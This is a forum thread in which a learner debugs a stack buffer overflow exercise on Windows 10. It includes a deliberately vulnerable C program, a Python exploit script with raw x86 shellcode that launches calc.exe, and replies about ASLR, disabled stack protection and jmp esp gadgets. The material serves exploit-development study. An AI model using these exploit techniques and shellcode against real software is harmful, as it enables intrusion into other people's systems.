Issues with stackoverflow bug

KR_Nails · May 24, 2019, 11:53pm

I am trying to exploit this exercise on windows 10 64 bits, but the executable is 32 bits . however I really exploit the program , but I want to redirect to calc.exe shellcode instead of letsprint , however when I try to inject my own shellcode . it doesnt work

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int copytobuffer(char* input){
     char buffer[15];
     strcpy (buffer,input);
     return 0;
}

void letsprint()
{
    printf("Hey!! , you succeeded\n");
    exit(0);
}

void main (int argc, char *argv[])
{
    int local_variable = 1;
    copytobuffer(argv[1]);
    exit(0);
}

#!/usr/bin/python
import sys, subprocess, struct


junk = "A" * 27

function = "\x24\x15\x40"

nops = "\x90" * 20

shellcode = ""
shellcode += "\x50\x53\x51\x52\x56\x57\x55\x89"
shellcode += "\xe5\x83\xec\x18\x31\xf6\x56\x6a"
shellcode += "\x63\x66\x68\x78\x65\x68\x57\x69"
shellcode += "\x6e\x45\x89\x65\xfc\x31\xf6\x64"
shellcode += "\x8b\x5e\x30\x8b\x5b\x0c\x8b\x5b"
shellcode += "\x14\x8b\x1b\x8b\x1b\x8b\x5b\x10"
shellcode += "\x89\x5d\xf8\x31\xc0\x8b\x43\x3c"
shellcode += "\x01\xd8\x8b\x40\x78\x01\xd8\x8b"
shellcode += "\x48\x24\x01\xd9\x89\x4d\xf4\x8b"
shellcode += "\x78\x20\x01\xdf\x89\x7d\xf0\x8b"
shellcode += "\x50\x1c\x01\xda\x89\x55\xec\x8b"
shellcode += "\x58\x14\x31\xc0\x8b\x55\xf8\x8b"
shellcode += "\x7d\xf0\x8b\x75\xfc\x31\xc9\xfc"
shellcode += "\x8b\x3c\x87\x01\xd7\x66\x83\xc1"
shellcode += "\x08\xf3\xa6\x74\x0a\x40\x39\xd8"
shellcode += "\x72\xe5\x83\xc4\x26\xeb\x41\x8b"
shellcode += "\x4d\xf4\x89\xd3\x8b\x55\xec\x66"
shellcode += "\x8b\x04\x41\x8b\x04\x82\x01\xd8"
shellcode += "\x31\xd2\x52\x68\x2e\x65\x78\x65"
shellcode += "\x68\x63\x61\x6c\x63\x68\x6d\x33"
shellcode += "\x32\x5c\x68\x79\x73\x74\x65\x68"
shellcode += "\x77\x73\x5c\x53\x68\x69\x6e\x64"
shellcode += "\x6f\x68\x43\x3a\x5c\x57\x89\xe6"
shellcode += "\x6a\x0a\x56\xff\xd0\x83\xc4\x46"
shellcode += "\x5d\x5f\x5e\x5a\x59\x5b\x58\xc3";

payload = junk + function + nops + shellcode

subprocess.call(['traditional_stack.exe', payload])

larkwiot · May 25, 2019, 12:50am

Your shellcode is not very readable. Do you have mitigations enabled? Where is calc running/stored? We need more information about your environment

dtm · May 25, 2019, 1:03am

How did you compile this? using which compiler? If gcc, with which flags? If MSVC++, are you using default flags?

KR_Nails · May 25, 2019, 1:28am

it was compiled like this
gcc.exe -m32 file.c -o file.exe" , but I add -fno-stack-protector . it doesnt work either

dtm · May 25, 2019, 1:29am

Have you tried to figure out why it doesn’t work? Where does it break?

KR_Nails · May 25, 2019, 1:32am

I know I have control over EIP.

#!/usr/bin/python
import sys, subprocess, struct

junk = "A" * 27
eip = "B" * 4
payload = junk + eip

#subprocess.call(['stack-overflow.exe', payload])

f = open("a",'w')
f.write(payload)

if I change my eip for letsprint works, but if I change for my jmp esp (kernelbase) , and shellcode doesnt work.

dtm · May 25, 2019, 1:44am

Have you checked kernelbase with ASLR? Maybe that’s why it’s not working. Are you checking using a debugger? If so, are you starting the process with the debugger or are you attaching?

KR_Nails · May 25, 2019, 2:03am

how can I compile this on visual cl?

gcc.exe -m32 -fno-stack-protector --no-pie -z stackexec "C:\Users\blackleitus\Documents\exploit develoment\Stack Based Overflows\stack-overflow.c" -o "C:\Users\blackleitus\Documents\exploit develoment\Stack Based Overflows\stack-overflow.exe"

dtm · May 25, 2019, 2:08am

As you said before, you can control eip so I don’t think your program has the issue. Try running your program and then attaching with a debugger (rather than starting the program with the debugger) and check when you jump to kernelbase that the address and instructions are correct.

KR_Nails · May 25, 2019, 3:07am

0BADF00D   -----------------------------------------------------------------------------------------------------------------------------------------
0BADF00D    Module info :
0BADF00D   -----------------------------------------------------------------------------------------------------------------------------------------
0BADF00D    Base       | Top        | Size       | Rebase | SafeSEH | ASLR  | NXCompat | OS Dll | Version, Modulename & Path
0BADF00D   -----------------------------------------------------------------------------------------------------------------------------------------
0BADF00D    0x74a50000 | 0x74c34000 | 0x001e4000 | True   | True    | True  |  False   | True   | 10.0.17134.376 [KERNELBASE.dll] (C:\WINDOWS\System32\KERNELBASE.dll)
0BADF00D    0x77c50000 | 0x77de0000 | 0x00190000 | True   | True    | True  |  False   | True   | 10.0.17134.228 [ntdll.dll] (C:\WINDOWS\SYSTEM32\ntdll.dll)
0BADF00D    0x76460000 | 0x76540000 | 0x000e0000 | True   | True    | True  |  False   | True   | 10.0.17134.376 [KERNEL32.DLL] (C:\WINDOWS\System32\KERNEL32.DLL)
0BADF00D    0x00400000 | 0x0041b000 | 0x0001b000 | False  | True    | False |  False   | False  | -1.0- [stack-overflow.exe] (C:\Users\blackleitus\Documents\exploit develoment\Stack Based Overflows\stack-overflow.exe)

here is how it looks like . I think maybe I create the poc in the wrong way . I just can jump to the function instead of poping a w00t

dtm · May 25, 2019, 3:11am

Does your exploit work under manual debugging?

KR_Nails · May 25, 2019, 3:13am

it works, but the only thing I can achieve is letsprint instead of poping a calc.

dtm · May 25, 2019, 3:14am

Perhaps your shellcode is incorrect? Have you verified if that is working?

KR_Nails · May 25, 2019, 3:16am

it works , because I use in windows 7 and it pop a calc.exe. I also used the windows 10 pop calc and doesnt work. maybe I create in the wrong way this sample.

dtm · May 25, 2019, 3:17am

Step through your shellcode in a debugger and find out where it goes wrong.

system · June 23, 2019, 11:53pm

This topic was automatically closed after 30 days. New replies are no longer allowed.